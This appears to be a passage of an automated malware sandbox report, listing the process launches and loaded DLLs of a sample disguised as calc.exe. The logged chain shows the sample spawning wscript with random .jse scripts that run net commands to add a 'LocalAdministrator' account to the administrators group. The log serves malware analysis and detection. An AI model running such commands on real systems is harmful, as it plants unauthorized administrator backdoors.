Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" argZvAmXhN.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" jjzYgN19ls.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" RBRDMGZ065.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" ikKn7NiVR4.jse | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: apphelp.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: mpr.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: winmm.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: wsock32.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: windows.storage.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: msasn1.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: msasn1.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: sxs.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: jscript.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: iertutil.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: scrrun.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: msasn1.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: gpapi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: propsys.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: edputil.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: urlmon.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: windows.staterepositoryps.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: wintypes.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: appresolver.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: bcp47langs.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: slc.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: sppc.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: onecorecommonproxystub.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: onecoreuapcommonproxystub.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sxs.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: jscript.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: iertutil.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msasn1.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptsp.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: rsaenh.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptbase.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msisip.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wshext.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrobj.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: mpr.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrrun.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: gpapi.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.storage.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: propsys.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: edputil.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: urlmon.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.staterepositoryps.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wintypes.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: appresolver.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: bcp47langs.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: slc.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sppc.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecorecommonproxystub.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: mpr.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: wkscli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: samcli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: iphlpapi.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: mpr.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: wkscli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: samcli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: iphlpapi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: mpr.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: winmm.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: wsock32.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: windows.storage.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: msasn1.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: msasn1.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: textshaping.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: textinputframework.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: coreuicomponents.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: coremessaging.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: ntmarta.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: wintypes.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: wintypes.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: wintypes.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: samcli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: dsrole.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: wkscli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: logoncli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: cryptbase.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: samlib.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: samcli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: dsrole.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: wkscli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: logoncli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: cryptbase.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: samlib.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: mpr.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: winmm.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: wsock32.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: windows.storage.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: textshaping.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: textinputframework.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: coreuicomponents.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: coremessaging.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: ntmarta.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: wintypes.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: wintypes.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: wintypes.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: mpr.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: winmm.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: wsock32.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: windows.storage.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: msasn1.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: msasn1.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: sxs.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: jscript.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: iertutil.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: scrrun.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: msasn1.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: gpapi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: propsys.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: edputil.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: urlmon.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: windows.staterepositoryps.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: wintypes.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: appresolver.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: bcp47langs.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: slc.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: sppc.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: onecorecommonproxystub.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: onecoreuapcommonproxystub.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sxs.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: jscript.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: iertutil.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msasn1.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptsp.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: rsaenh.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptbase.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msisip.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wshext.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrobj.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: mpr.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrrun.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: gpapi.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.storage.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: propsys.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: edputil.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: urlmon.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.staterepositoryps.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wintypes.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: appresolver.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: bcp47langs.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: slc.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sppc.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecorecommonproxystub.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: mpr.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: wkscli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: samcli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: iphlpapi.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: mpr.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: wkscli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: samcli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: iphlpapi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: mpr.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: version.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: winmm.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: wsock32.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: uxtheme.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: windows.storage.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: wldp.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: kernel.appcore.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: msasn1.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: msasn1.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: sxs.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: jscript.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: iertutil.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: amsi.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: userenv.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: profapi.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: scrrun.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: msasn1.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: gpapi.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: propsys.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: edputil.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: urlmon.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: srvcli.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: netutils.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: windows.staterepositoryps.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: sspicli.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: wintypes.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: appresolver.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: bcp47langs.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: slc.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: sppc.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: onecorecommonproxystub.dll | |
Source: C:\Users\user\Desktop\calc.exe | Section loaded: onecoreuapcommonproxystub.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: samcli.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: netutils.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: dsrole.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: srvcli.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: wkscli.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: logoncli.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: cryptbase.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: samlib.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: samcli.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: netutils.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: dsrole.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: srvcli.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: wkscli.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: logoncli.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: cryptbase.dll | |
Source: C:\Windows\SysWOW64\net1.exe | Section loaded: samlib.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: version.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: kernel.appcore.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: uxtheme.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sxs.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: jscript.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: iertutil.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: amsi.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: userenv.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: profapi.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wldp.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msasn1.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptsp.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: rsaenh.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptbase.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msisip.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wshext.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrobj.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: mpr.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrrun.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: gpapi.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.storage.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: propsys.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: edputil.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: urlmon.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: srvcli.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: netutils.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.staterepositoryps.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sspicli.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wintypes.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: appresolver.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: bcp47langs.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: slc.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sppc.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecorecommonproxystub.dll | |
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: mpr.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: wkscli.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: netutils.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: samcli.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: srvcli.dll | |
Source: C:\Windows\SysWOW64\net.exe | Section loaded: iphlpapi.dll | |
